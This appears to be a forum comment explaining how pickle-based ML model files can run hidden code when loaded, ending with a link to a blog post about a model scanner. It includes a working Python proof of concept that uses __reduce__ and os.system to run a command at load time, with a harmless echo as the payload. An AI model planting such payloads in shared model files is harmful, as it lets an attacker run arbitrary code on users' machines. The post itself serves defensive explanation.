Absolutely, though that isn't strictly what we're talking about here.
In this case, the models themselves are fundamentally just files. Malicious code can be embedded in those files and executed the moment the model is loaded for further training or inference, with nothing obvious to tip off the user that anything ran. It's a very nasty potential attack vector.
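To make the mechanism concrete, here's a minimal sketch of the classic vector: Python's pickle format (which torch.save uses under the hood for .pt/.pth files) calls an object's __reduce__ method during deserialization, so simply loading the file is enough to run attacker-controlled code. The EvilPayload class and model.bin filename are purely illustrative, and the payload here is a harmless echo:

```python
import pickle


class EvilPayload:
    """Illustrative malicious object embedded in a "model" file.

    pickle invokes __reduce__ during deserialization, so the callable
    it returns runs the moment the file is loaded -- no model code
    needs to be called explicitly.
    """

    def __reduce__(self):
        import os
        # Harmless stand-in for an attacker's command
        return (os.system, ("echo 'arbitrary code ran at load time'",))


# Attacker ships the payload as what looks like model weights
with open("model.bin", "wb") as f:
    pickle.dump(EvilPayload(), f)

# Victim "loads the model" -- the command executes immediately
with open("model.bin", "rb") as f:
    pickle.load(f)
```

This is exactly why scanning model files before loading them (or preferring formats that can't carry executable payloads, like safetensors) matters.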
I wrote a blog post about it here: https://protectai.com/blog/announcing-modelscan